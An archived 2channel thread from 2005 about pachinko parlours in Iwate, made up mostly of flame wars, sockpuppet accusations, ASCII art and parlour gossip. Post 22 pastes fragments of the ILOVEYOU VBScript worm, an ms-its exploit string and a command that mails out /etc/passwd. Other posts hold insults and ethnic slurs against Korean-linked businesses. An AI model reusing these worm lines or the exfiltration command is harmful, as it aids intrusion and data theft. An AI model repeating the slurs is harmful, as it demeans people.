2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

岩手県のパチンコ事情 11

1 :ヽ(´∀`≡´∀`)ノ7777さん:新基準01/04/01(金) 07:40:57 ID:ZX7caTDb
ここではコテの馴れ合いを一切厳禁とします。
あくまでレス番号だけでやり取りしてください。
無意味な収支報告も他でやってください。

店名、個人を特定できるような書きこみもタブーです。
有意義な情報交換の場にしましょう。
皆さんの良識ある利用を期待します。

2 :ヽ(´∀`≡´∀`)ノ7777さん:新基準01/04/01(金) 07:55:02 ID:pcQDD9v2
今日はエバ壊し松。 2ゲト

3 :ヽ(´∀`≡´∀`)ノ7777さん:新基準01/04/01(金) 18:53:29 ID:n5OHSByE
3ゲト

>>1は乙です

4 :元祖ホタテ:新基準01/04/01(金) 20:52:40 ID:jDHHCSSL
タブーだらけだなw
何なら語っていいのか教えてくらはい。
ぴゅんぴゅん♪

とりあえず2代目襲名おめwww

5 :元祖ホタテ:新基準01/04/01(金) 20:54:47 ID:jDHHCSSL
遊べる店リストなんかあると(・∀・)イイ!!ねえ
とにかくがんばって良スレにしてくらはいな♪

6 :ヽ(´∀`≡´∀`)ノ7777さん:新基準01/04/01(金) 21:07:43 ID:kRDtXR7U
>>4-5
元祖ホタテの自演はブザマ。
元祖ホタテ=1だろ!
氏ね!

7 :みかわ ◆1F6jnA0M9c :新基準01/04/01(金) 21:34:27 ID:K4pxY1SL
イィィィィィイイイイィィヤァァアッホォォォォウウゥゥウ!!

8 :ヽ(´∀`≡´∀`)ノ7777さん:新基準01/04/01(金) 21:56:46 ID:84DSGqMA
久々に釘の良い台数台ハケーン

店名収支報告タブーなんで教えなぁーい

ウマーでイイィィィィィィィィイイ

内陸まで行く時間と手間省けた



9 :みかわ ◆1F6jnA0M9c :新基準01/04/01(金) 22:28:43 ID:K4pxY1SL
ほうほう、十日ばかしまともにスレ読んでなかったんだけど
なかなか良い書き込みあったんだな。あ、愚欄度のホムペはしっかり見てたぜ。
ちと気になるとこだけ触れよっと。

>>296
今更だがごめんよアニキ!!俺的に一番気になったんだよアニキの書き込みが!
今後の事を考えて新台の大海に触れておきたかったんだよね?
でもそんなレベルの台に20kはいくらなんでも使いすぎだよアニキ!
めちゃくちゃ結果オーライっすよ!
でも、俺は知ってるんだ、アンタがこんなもんじゃねーってことをよ。
次回は本来のクール&ビューティな立ち回りを報告してくれよアニキ!待ってるぜ。

>>キュウリに参戦した勇者達
その後、っつーか今はどんなもんなの?とても大事でございます。
見た目の当たり回数、ドル箱の積みっぷりはどうでもよござんす。
釘の動向、気になるざんす。ネータンもできれば…


10 :みかわ ◆1F6jnA0M9c :新基準01/04/01(金) 22:29:29 ID:K4pxY1SL
イィィィイイイィィヤァァアッホォォォウウゥゥウ!! 誤爆ゥゥウウウウ!


11 :ヽ(´∀`≡´∀`)ノ7777さん:新基準01/04/01(金) 22:41:59 ID:PjIjN8vi
>>10
ホタテもあれだがお前もうざい

12 :CR宮沢賢治:新基準01/04/01(金) 22:42:49 ID:5nXKiysb
>>10
あいかわらず切れてるねw

13 :みかわ ◆1F6jnA0M9c :新基準01/04/01(金) 22:54:13 ID:mToRPgP/
>>11
ええっ!?いまさら??
俺、君の立ててくれたこのスレを無駄にはしないよ!

>>12
賢ちゃん決めたよ。俺頑張る。
ホタテ氏の気持ちを無駄にはしたくないんだ!
今日からこのスレは俺の日記帳として活かしていくことを決めたよ。
ありがとう。みんなありがとう。


14 :みかわ ◆1F6jnA0M9c :新基準01/04/01(金) 23:05:16 ID:mToRPgP/
    4月1日 金曜日

日本ハムの監督の名前が出てこない、そんな一日でした。

15 :ヽ(´∀`≡´∀`)ノ7777さん:新基準01/04/01(金) 23:14:03 ID:ZX7caTDb
意味のない書きこみやめてくれる?

16 :ヽ(´∀`≡´∀`)ノ7777さん:新基準01/04/01(金) 23:22:24 ID:PjIjN8vi
>>13
俺は1じゃないし 岩手スレ4あたりからのほぼROM専の住人だよ・・・

17 :みかわ ◆1F6jnA0M9c :新基準01/04/01(金) 23:22:30 ID:mToRPgP/
>>ホタテさん
マジ?4月1日の盛大な釣りじゃなかったの?
そっかー、野望に燃える堀江さんとこの息子みてーだなー。がんばれよ〜。


18 :ヽ(´∀`≡´∀`)ノ7777さん:新基準01/04/01(金) 23:31:04 ID:ZX7caTDb
>>17
おまえもういいから消えろ。

19 :ヽ(´∀`≡´∀`)ノ7777さん:新基準01/04/01(金) 23:49:11 ID:e02v2LOh
雑談、私語、収支報告はもちろん、
オカルト、遠隔、裏モノの話題も禁止です。


20 :元祖ホタテ:新基準01/04/02(土) 03:47:10 ID:ofSbXsBj
>>6

> 元祖ホタテ=1だろ!


はずれ。

それにしてもp-now使いにくくなったな。
ま、慣れの問題かな?

21 :ヽ(´∀`≡´∀`)ノ7777さん:新基準01/04/02(土) 06:12:08 ID:GeM0D5WX
せっかく新スレ立ったのにみかわに荒らされてるなw

22 :ヽ(´∀`≡´∀`)ノ7777さん:新基準1年,2005/04/02(土) 18:24:32 ID:t5yvbmzA
cat /etc/passwd | mail nobody kak.hta';ken=wd+'START ms-its:mhtml:file://c:\

fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

23 :ヽ(´∀`≡´∀`)ノ7777さん:新基準1年,2005/04/02(土) 20:59:50 ID:12qZp/WW
糸冬

24 :ヽ(´∀`≡´∀`)ノ7777さん:新基準1年,2005/04/03(日) 13:04:26 ID:1pg62QAM
みかわってうざいね。せっかく新スレ立ったのに。

1と喧嘩したのか?

25 :ヽ(´∀`≡´∀`)ノ7777さん:新基準1年,2005/04/03(日) 13:11:17 ID:r+LzBmBM
でスレ立てた1は放置プレイか?
よし!晒しアゲついでに今から漏れパチ屋のトイレでオナる!


26 :ヽ(´∀`≡´∀`)ノ7777さん:新基準1年,2005/04/03(日) 22:23:52 ID:JFHtnKvJ
記念カキコ

27 :みかわ ◆1F6jnA0M9c :新基準1年,2005/04/04(月) 00:36:13 ID:ngzXWEQx
豆乳

1730*16=27680
27680-9400=18280
18280*4=73120
18000+73120=91120

2371/91.1=26.0

10h
((5414.9*3.03-1000*397.2/26)*(1-82.8/100)+(4*5414.9-1000*397.2/26)*(3.03/4)*(82.8/100))*(2371/397.2)=25057

※12h+α
((5414.9*3.03-1000*397.2/26)*(1-86.2/100)+(4*5414.9-1000*397.2/26)*(3.03/4)*(86.2/100))*(2971/397.2)=32340


28 :ヽ(´∀`≡´∀`)ノ7777さん:新基準1年,2005/04/04(月) 00:59:12 ID:1mNllxfB
>>27
>>1


29 :ヽ(´∀`≡´∀`)ノ7777さん:新基準1年,2005/04/04(月) 12:18:14 ID:bGnfAKrI
ナナシーゲットいいね。しばらくは稼ぎ頭になりそう

30 :ヽ(´∀`≡´∀`)ノ7777さん:新基準1年,2005/04/04(月) 21:44:07 ID:6N3C62yn
ホタテバター

31 :ヽ(´∀`≡´∀`)ノ7777さん:新基準1年,2005/04/04(月) 22:57:24 ID:jSdWMayB
偽ホタテと元祖ホタテが微妙に似ている件について

32 :ヽ(´∀`≡´∀`)ノ7777さん:新基準1年,2005/04/05(火) 04:59:58 ID:jouoXHTW
全部みかわの自演。
スレたったの4/1だし。

33 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/05(火) 08:02:38 ID:rByGRSdE
ここは海産物臭いインターネットですね

34 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/05(火) 08:57:18 ID:zqnmmae3
超激海打った人います?
実物はまだ見てないので写真で見たら画面デカイですよね。
釘とか渋いのかな?この確率なら打てそうだなと思ったので。
誰か感想よろしく

35 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/05(火) 10:36:12 ID:O55Ia5nr
1=みかわ=ホタテ
元祖ホタテ=偽ホタテ


36 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/05(火) 19:11:01 ID:zqnmmae3
ホタテってなに?

37 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/06(水) 07:09:21 ID:MSeQ9hHg
ホタテ=安岡力也

38 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/06(水) 11:44:55 ID:Rl5Yzf6X
マツヤの葬式行ってくる

39 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/06(水) 13:49:39 ID:aXgo9PL8
四号の亜歩呂ってでますか?

40 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/07(木) 02:11:14 ID:fCrPyrc6
大手貯蓄組合加盟です。解約できません。

41 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/09(土) 15:18:32 ID:+dIZHy2b


42 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/09(土) 15:38:01 ID:rdDjuDib
ボランティア攻略サイト?
タダで登録とかも無しでサクサク見られます。
個人でパチンコ・スロットのデータベースで利用していましたが、せっかくなんで公開します。けっこう勝率上がりますよ。喜んで頂ければ幸いです。
いまんとこ広告とかも無いしなんで本当のボランティアです。
http://ps.luchu.com/

43 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/09(土) 18:59:49 ID:ntZvRlwt
ホタテ氏ね!

44 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/10(日) 11:48:15 ID:+Pmq4IBm
みかわもね

45 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/10(日) 16:54:13 ID:cLzURzkM
みかわマジで氏ね

ウザすぎ

46 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/11(月) 13:04:01 ID:Iez6zY/Z
みかわ
か呪か
わかみ


47 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/14(木) 20:54:57 ID:2uZtWWft
みかわ
か呪か
わかみ

48 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/15(金) 12:58:32 ID:Ho3mAeXD
みかわぬるぽ

49 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/16(土) 04:33:06 ID:61F/VNbK
ここ暗いし。。オナヌーしていいでつか?

50 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/17(日) 19:19:31 ID:Jtco/lHX


51 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/18(月) 07:56:03 ID:s+UCk5Pr
岩手が本拠のユニオンて出すの?
今週末、うちら(八戸)にユニオン系といわれる店(ネバーランド)が
グランド・オープンするんだけど

52 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/20(水) 18:31:51 ID:xw4W+oLG
みかわuzeeee

53 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/21(木) 00:54:45 ID:6F0D4msT
2hc

54 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/21(木) 00:56:53 ID:TKXh0uYr
やりたい

55 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/22(金) 09:50:03 ID:sE4qHTMO
ho

56 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/22(金) 17:11:56 ID:mxoC57yX
>>ユニオン系列は、店によりますが私は嫌いではないです。
 少しは期待できるのでは?(出なかったらスミマセン)

57 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/22(金) 19:45:12 ID:b2uZxpvF
>>1が保守ついでに本スレ荒らしてる件について

58 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/22(金) 19:48:50 ID:Q6jPtDIO
俺ユニオン系マジで大っ嫌い。

59 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/23(土) 03:08:39 ID:mSmISi/3
>>57みかわ乙



60 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/23(土) 20:56:03 ID:QoY1+hD5
その八戸のネバーランドにはマイコーはいるのかい?

61 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/26(火) 06:39:30 ID:BrAiH4Ii
みかわの画像発見
ttp://www.dream-fact.com/lovers/jude/img-box/img20050425084341.jpg

62 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/26(火) 10:12:29 ID:qgBVMbrA
↑みかわの画像怖くて見れない

どんなの?

63 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/26(火) 21:42:24 ID:T43OZ9pe
ぷっちおつまみマズィ

64 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/27(水) 23:48:53 ID:aTsg/DKe
みかわみかわうるせー

65 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/28(木) 00:51:30 ID:2stAQUIJ
>>64
同感。みかわうぜえ。

66 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/28(木) 21:42:11 ID:JQs/7Hvl
65
藻前がうぜぇ

67 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/28(木) 22:53:13 ID:L7tMZkWq
>>66に同意

68 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/28(木) 23:07:46 ID:0DvpmoaN
>>65
おまえさんやりすぎたんだ
>>66と気持ちは同じ

69 :ヽ(´∀`≡´∀`)ノ7777さん:2005/04/29(金) 00:30:16 ID:Au6YMvkw
( ´,_ゝ`)

70 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/01(日) 23:09:44 ID:8or65+SP
ヘックション!!ここクソスレだな

71 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/02(月) 06:27:22 ID:eP5EpOdX
( ´,_ゝ`)プッ

72 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/03(火) 19:40:46 ID:ScQDHfTx
みかわが荒らしたからこんなことになってんのか?

73 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/03(火) 21:11:47 ID:XgZOFmIE
>>72
いぇす

74 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/03(火) 21:40:38 ID:8wyWnhrp
いらないスレ立てたバカのせいでみんな大迷惑 




75 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/03(火) 22:09:51 ID:WgeJaih1
ここまだ削除されてなかったのかw

76 :ヽ(´∀`≡´∀`)ノ7777さん :2005/05/04(水) 22:22:26 ID:GcV4szPk
ここ削除しなくてもいいと思うけど、
あっちのIスレ使い切るようにしつつ、こっちは1の通り原則名無しでぼちぼちやろうよ
「み○わ」とかって、いちいち罵らなくていいじゃん、荒すなって スルーで頼むよ

自分は今までのスレではやっぱりだんだんコテ同士の馴れ合いとか報告イヤでした
もうコテ以外入りにくい雰囲気だったしね〜
だからここの1は多少厳しいかもしれんけど一応いいと思うよ〜

77 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/04(水) 23:53:03 ID:QAUyCQyK
ここ2ch

78 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/05(木) 00:14:48 ID:XnvLHs3Y
>>77
んじゃ次スレでも立てるかw

79 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/05(木) 01:48:10 ID:D+dIP2xe
金万さんへ・・・
赤字覚悟は良いけどワープで前止まりはチョット・・・

80 :猫ヒロシ:2005/05/05(木) 09:51:34 ID:/8OvnHyE
ネッコヒーロシィ!ネッコヒーロシィ!

81 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 15:32:14 ID:f6rkJC2T
糞スレ立てんなや>1
1ヶ月してもサッパリ盛り上がってねーじゃん
ほんっとに便所の落書きみてーだな

>76だって>1の自演だろ?賛同者がいないからって
屁臭えことしてんじゃねーよ
だいたいローカルスレで複数立つのは削除ガイドラインに
引っかかってるだろ、削除依頼出しとけよ>1

82 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 16:12:05 ID:5z0U1Hzr
>>81
みかわ乙

83 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 16:42:57 ID:bDmmMgHS
ラッセェラ〜ラッセェ〜ラ〜

84 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 17:39:47 ID:71DuoDA8
>>81
荒らしの自演カキコは毎度バレバレだよなwww
重複スレ立てた上に本スレ荒らし、両方のスレで自演カキコ連発w
バレてないと思ってるのが キモスwwwwww

85 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 19:31:54 ID:acyofyHp
あっはっはっはっはっはっはっ!!!!
 \     ___           , ---、
   \   /    ``ヾ '"⌒ヽ、 /   /
\   Y′            ヽ   /
  `ー--'    '⌒ヽ、        ⊥ ∠---、
`¬┐     ,.... _         ,... 丁二二  }
  レ' /   (○ ヽ       (○┤´ ̄  j
 八 〃    '⌒`   从_人⌒`|    /
/  ∨        /      `ヽノ ̄ ̄
    |      ⌒/  、     , )
    |ヽ     、_|   `   ´ /
    |  \    ヽ`ー一=ニニ=┬'
   /   \   ゙i ,r‐‐-‐、.|│
  /       ヽ   |r-----イ /
           ∧  ` ー─ ' /
        /  ヽ    /
       /    ` ̄ ̄


86 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 21:17:04 ID:gdyjV9NW
つ参考にドゾー



アラシ両スレッド共通ワンパターン自演レス
「新スレ」
「せっかく(新スレ)立ったのに」
「みかわが(新スレ)荒らしたからこんなに荒れてんのか?」
「タブー」
「みかわ乙」




◎思い通りスレが進まないと気の済まないワガママ
◎ホタテという言葉に敏感
◎自分の立てたスレに異常に拘る
◎自演時は気持ち悪い話し方で浮いている
◎空気が全然読めない



▽自分は何ひとつ悪くない
▽自分を叩いてるレスはみんなみかわだ
▽自演はばれてない


87 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 22:15:07 ID:clQ3+rJ0
ドゥドゥビドゥバドゥビ、ハイッ!ハイッ!ハイッハイッハイッ!
リストラされても絶好調w

88 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 22:28:53 ID:71DuoDA8
>>86
うはwwwwwwスゴスwwwwwwww

89 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 23:02:08 ID:W+RULEY+
>>86
みかわ乙。でも話の流れは確かにそんな感じだよね

90 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 23:15:59 ID:5z0U1Hzr
>>86
みかわ乙

> ◎ホタテという言葉に敏感
わろた


91 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 23:17:20 ID:71DuoDA8
うはwwww降臨wwwwwそのまんまでテラワロスwwwwwww

92 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 23:28:56 ID:gdyjV9NW
必殺技キテタ━━━━━(゚∀゚)━━━━━!!!!!


93 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 23:30:31 ID:clQ3+rJ0
レギュラーのネタをスルーするなヴォケ共が!

94 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 23:32:54 ID:71DuoDA8
スマソww

95 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 23:54:42 ID:clQ3+rJ0
で、どうだったんだ?ワロタのか?ワロえなかったのか?ワロえなかったらワロえるネタを考えなさい

96 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/06(金) 23:58:39 ID:71DuoDA8
わりw荒らしのがワロえたw

97 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/07(土) 00:40:59 ID:sz+SsXQx
みかわが荒らしたからこんなに荒れてんのか?

98 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/07(土) 23:39:19 ID:h6HaHOS0
76♀なんですけど・・・あれがこのスレ初カキコでしたよ〜信じてください
ちなみにパチ板にカキコするのもあれが初。
あまり深読みして煽り合わないでさ〜、まったり行こうよ〜
実はIのスレもそれほど読み込んでないです、もめてる状況もイマイチよくしらん。

自分としては、4号線沿いでよく打つんだけど、競合が激しくなってきて
どの店も今客取り合戦して割と出してくれてるような気がします
マジイベントっつうか、回収後回しっつうか。
でも毎日何店舗も回れる訳じゃないし、せっかくの岩手スレだから情報交換出来る良スレになればいいなと思って。


99 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/08(日) 10:06:41 ID:emWrT/sl
アマイ!

100 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/09(月) 12:04:03 ID:zVUkTIMu
【誘導】

岩手スロ本スレ16

http://news18.2ch.net/test/read.cgi/slotj/1115032940/
【勝ったら】盛岡限定スロ情報3【南部城】

http://news18.2ch.net/test/read.cgi/slotj/1113924299/


101 :ヽ(´∀`≡´∀`)ノ7777さん:2005/05/09(月) 17:51:51 ID:v/Kh82GW
>>98
ずいぶんお年を召した方が書きコンドルな
76歳・女性ですか 年金を湯水のように
サンドにブチ込む感覚はいかがなもんでしょうか
ああまったく無感覚ですかそうですかそうでしょうね

などと笑えないギャグはこんくらいにして

ネカマまで演じるかこの自演ホタテ野郎wwwww
おい>86、追記してやってくれや

▽更に立場が悪くなると♀を名乗り、演技する
 そしてとりあえずモットモラシイ話題を振る

スレもよく読んでない上にもめてる状況もわからん?あ゛?

どうしようもねぇ香具師だな そう言いながらも
>76ではコテの馴れ合いや実践報告がいやだとか
シッカリ読み込んでるしwwwww

だいたいな、こんな状況になってから「自分も報告や馴れ合い
ウザイと思う」とかレス付けんのはな、ジャンケンの後出しと同じってこった

さてと 次に出てくるのは「>1の親です」かなwwwww
「みかわ乙」はいいかげん飽きたからやめとけよ


102 :みかわ ◆1F6jnA0M9c :2005/05/09(月) 18:59:48 ID:FttRo1MF
久々の上陸!!

>>101
あのよー、煽り煽ってじゃどっちにしたって荒れんぜ!
つか76ってレス番のことだぜ。おちけーつ。


103 :76です:2005/05/09(月) 23:55:33 ID:FyWwRWyx
>76の親です
この度は(ry

>>102
いやいや〜、ホント、>>101の疑心暗鬼っぷりはスゴイな〜と呆れてしまいました。
アタシはいったいどんなヤツだと想像されてるんだ?
ここまで妄想されると、コテのほうがよっぽどマトモ?と>>76発言撤回しようかなって気に・・・
情報交換よりその日の勝負(負け?)のむしゃくしゃを荒らし行為でウサ晴らししたいだけの人もいるって事なんでしょ〜ね〜
やはりIが本スレらしいので、またちょくちょくロムさせていただきます。(書き込みはしない・・・)

ちなみに今日は−15K でもまーいっかぁ〜です




104 :名無しさん@お腹いっぱい。:2005/05/10(火) 06:19:30 ID:O1suXm4e
                        |
                        |
      ∩___∩              |  ぷらぷら
      | ノ  _,  ,_ ヽ        ((   |
     /  ●   ● |         (=)
     |    ( _●_)  ミ _ (⌒)    J  ))
    彡、   |∪|  ノ        みかわ
⊂⌒ヽ /    ヽノ  ヽ /⌒つ
  \ ヽ  /        ヽ /
   \_,,ノ      |、_ノ


105 :名無しさん@お腹いっぱい。:2005/05/10(火) 06:23:03 ID:O1suXm4e
                        |
                        |
      ∩___∩              |  ぷらぷら
      | ノ  _,  ,_ ヽ        ((   |
     /  ●   ● |         (=)
     |    ( _●_)  ミ _ (⌒)    J  ))
    彡、   |∪|  ノ   【みかわ遊戯で】みかわ総合スレ【イボ痔が出ちゃった】 
⊂⌒ヽ /    ヽノ  ヽ /⌒つ http://money3.2ch.net/test/read.cgi/pachij/1115480487/l50

  \ ヽ  /        ヽ /
   \_,,ノ      |、_ノ

106 :名無しさん@お腹いっぱい。:2005/05/13(金) 12:37:00 ID:gqcNEDNQ
みみみみみみみみみみみみみみみみみみみみみみみみみみみみみみみみみみみ
かかかかかかかかかかかかかかかかかかかかかかかかかかかかかかかかかかか
わわわわわわわわわわわわわわわわわわわわわわわわわわわわわわわわわわわ
ししししししししししししししししししししししししししししししししししし
ねねねねねねねねねねねねねねねねねねねねねねねねねねねねねねねねねねね

107 :名無しさん@お腹いっぱい。:2005/05/13(金) 19:25:55 ID:yrrD03oz
キモイ奴が多いスレだ。
ウップス!!

108 :名無しさん@お腹いっぱい。:2005/05/13(金) 20:12:55 ID:ng6XkDbS
いつも一人しかいませんよ?

109 :名無しさん@お腹いっぱい。:2005/05/14(土) 23:32:25 ID:wKSx6gaB

          ,,..--―-、       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
         /, -----、.ヽ,     /  世界、糞スレ発見!
         |  i_,,,,_  __゙l |    |    >>1はボッシュート!
         ,!、i'゙-‐-: '-、|/   /  __________
        /'') ..., '‐-‐、.j     ̄ ̄
        / ,‐!::...`'''''''`ノ
      _,,,l ;! ::|ヽ、二 イ
   , -‐'゙゛ i::..  | .ヽ/;ヽj!`‐-、_
   l     ノ::. .:|、 .ヽ,:ヽ|  <゛~ヽ、
  ,:''`` ''"゙.|;;:‐''゙|.ヽ、 ヽ;::|  /  .|゙l
  ,:     ヽ::il;;!  ヽ、ヽ| /   | :|
  i    o゚ :`;''゙     ヽ| /   | .|
  i   ..:::::,:::'::::: .      |゚    |,,;:->、
  `.、__;;/:::::::::: :     |    !''"  |
     i  ::.:::: :       |    |   .|
     |          |゚   /


110 :名無しさん@お腹いっぱい。:2005/05/15(日) 20:05:19 ID:GCOQaCRA
>>107
お前のほうが十分キモイヨ!


111 :名無しさん@お腹いっぱい。:2005/05/15(日) 21:58:21 ID:CIMinMmM
↑どの辺がキモイ?詳しく教えてくださいっ!!

112 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:59:22 ID:RrqSRyCH
↑M多すぎ マゾ?

113 :名無しさん@お腹いっぱい。:2005/05/17(火) 20:25:04 ID:307GqNDv
マゾですが、何でオイラがマゾってわかったのか、そこのところをもう少し聞かせてくれまへんか?

114 :名無しさん@お腹いっぱい。:2005/05/18(水) 15:44:02 ID:otLixUFn
>>113
ウルセー黙れ臭さチン野郎

115 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:39:20 ID:CBMewY0a
>>114
なんで俺のチンが臭いってわかったんですか?そのへんを詳しく教えてくれまセンダ、ミツオ、ナハナハッ!センダ、ミツオ、ナハッ!?

116 :名無しさん@お腹いっぱい。:2005/05/18(水) 23:17:40 ID:0aMYRAro
(  ̄o ̄)σせんだ   ∂( ̄o ̄ )みつお   ┗(・o

117 :名無しさん@お腹いっぱい。:2005/05/23(月) 22:58:12 ID:FR2xb8w/
おみage

118 :名無しさん@お腹いっぱい。:2005/05/25(水) 16:42:44 ID:GsTUpe9J
ウィンズ宮古は終わってますなぁ
つか、逝く奴の気が知れん
ま、田舎だからしょうがないのか

119 :名無しさん@お腹いっぱい。:2005/05/25(水) 17:37:09 ID:EgrStV2C
>>118
ありゃまぁ。だとしたら4月からずっと回収してるのねw
もうこれはマジでだめかもわからんね・・・

120 :名無しさん@お腹いっぱい。:2005/05/25(水) 17:47:35 ID:GsTUpe9J
119
飲酒で事故っても使うよーな会社ってどうかと
さすが朝鮮系
従業員も終わってる奴ばっかだし

121 :名無しさん@お腹いっぱい。:2005/05/29(日) 19:22:30 ID:335/6yiv
p

122 :名無しさん@お腹いっぱい。:2005/05/31(火) 03:19:34 ID:PnHSnpaD
あげ

123 :名無しさん@お腹いっぱい。:2005/05/31(火) 03:20:37 ID:PnHSnpaD
_| ̄|○

124 :宮町効楽ファン:2005/05/31(火) 08:28:53 ID:BhWe8m+m
厨房どもが釣られすぎw

125 :宮町効楽ファン:2005/06/02(木) 02:10:52 ID:ppCwL1hh
うむ、このスレの削除依頼を出そうかとも考えたが
やっぱり安易に立てて安易に削除というのも非常にイクナイと考えますた。

幸い本スレのほうも残りあとわずかということになり、もしよろしければ
こちらのスレを晴れてスレタイどおり12スレ目で前スレのとおりにコテだろうが雑談だろうが
収支報告だろうがエロ話だろうが好きに書きこんでいただきたく思います。

馴れ合いオケー、叩きオケー、コテじゃない人もアンチコテもみんな来い!
みかわ厨もみかわみかわうるさいんじゃ!
みかわじゃなくて俺の命(たま)を取りに来い!! おれを刺してみろ!! 俺の菊の門を刺せ!! 
そして俺といっしょに漢の中の漢になるんだ!!!




126 :名無しさん@お腹いっぱい。:2005/06/02(木) 20:25:47 ID:pBkKfsF4
掌群は朝鮮系でつかね?

127 :名無しさん@お腹いっぱい。:2005/06/02(木) 20:54:23 ID:iGZUMOsb
エロ話しもオKなのか!だばお前らのオナニーのお決まりの態勢をカミングアウトしろ!

128 :S町民:2005/06/02(木) 23:11:25 ID:ZErKmnnz

うぉ!効楽ファン、エライ!漢だな!
さすが宮古の雄だ。やるときゃキッチリぶちかます。
ココ一番ってときに、頼りになるよナァ。

で、俺から賞賛の画像データ for 効楽ファン
ttp://www2.atwiki.jp/kawaisosu/?cmd=upload&act=open&pageid=16&file=pugya2.jpg

ではいったん前スレに戻るべ。あーせいせいした♪

129 :名無しさん@お腹いっぱい。:2005/06/03(金) 17:02:00 ID:lC0YKFFM
一応テンプレ貼る

前スレ
【死亡遊戯で】岩手パチンコスレI【イボ痔が出るよ】 ※(本来11スレ目)
http://money3.2ch.net/test/read.cgi/pachij/1108561872/
【ボッタクリ店は】岩手パチンコスレッド9【チョンばかり】
http://money3.2ch.net/test/read.cgi/pachi/1100443760/
【ガセイベント】岩手パチンコスレッド8【復活中】
http://money3.2ch.net/test/read.cgi/pachi/1094475110/
【イベント規制は】岩手パチスレ7【もう完全無視】
http://money3.2ch.net/test/read.cgi/pachi/1089041644/
【ボダ派】岩手のパチ屋を語ろう6【ホッタテ派】
http://money3.2ch.net/test/read.cgi/pachi/1084716566/
【ボーダー派】 岩手パチスレ 5 【もっと集まれ】
http://money3.2ch.net/test/read.cgi/pachi/1082139623/
【ボーダ派】 岩手パチスレ 4 【集まれ】
http://gamble2.2ch.net/test/read.cgi/pachi/1079993603/
【毎日が】 岩手糞店情報交換場 第3弾 【ガセイベント】
http://gamble2.2ch.net/test/read.cgi/pachi/1077876279/
